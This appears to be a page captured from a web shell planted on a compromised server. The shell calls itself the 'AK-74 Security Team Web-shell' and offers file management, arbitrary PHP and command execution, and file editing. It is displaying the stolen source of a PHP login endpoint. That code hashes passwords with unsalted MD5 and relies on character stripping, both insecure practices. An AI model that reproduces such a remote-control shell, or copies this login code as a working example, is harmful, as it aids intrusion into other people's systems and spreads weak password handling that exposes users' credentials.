.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<?php session_start(); include('init.php'); include('func/fn_common.php'); // Set response header header('Content-Type: application/json'); // Prepare response array $response = [ 'success' => false, 'message' => '', ]; // Validate input if (empty($_POST['username']) || empty($_POST['password'])) { $response['message'] = 'VALIDATION_ERROR'; echo json_encode($response); exit; } $username = trim($_POST['username']); $username = strtolower($username); $username = substr($username, 0, 50); $username = str_replace("\\", "", $username); $username = str_replace("/", "", $username); $username = str_replace("|", "", $username); $username = str_replace("(", "", $username); $username = str_replace(")", "", $username); $username = str_replace("'", "", $username); $username = str_replace('"', "", $username); $username = str_replace('', "", $username); $password = $_POST['password']; // Optional: extra validation (length, characters, etc.) if (strlen($username) < 3 || strlen($password) < 3) { $response['message'] = 'VALIDATION_ERROR'; echo json_encode($response); exit; } // Sanitize input to prevent SQL injection (use prepared statements instead of escaping) $stmt = $ms->prepare("SELECT * FROM gs_users WHERE username = ? AND password = ? LIMIT 1"); $hashed_password = md5($password); $stmt->bind_param("ss", $username, $hashed_password); $stmt->execute(); $result = $stmt->get_result(); if ($result && $result->num_rows > 0) { $user = $result->fetch_assoc(); if ($user['active'] === 'true') { $response['success'] = true; $response['message'] = 'VALID'; } else { $response['message'] = 'ERROR_ACCOUNT_LOCKED'; writeLog('user_access', 'User login: account locked. Username: "' . $username . '"'); } } else { $response['message'] = 'INVALID_CREDENTIALS'; writeLog('user_access', 'User login: invalid credentials. Username: "' . $username . '"'); } echo json_encode($response); ?>
Rename:
-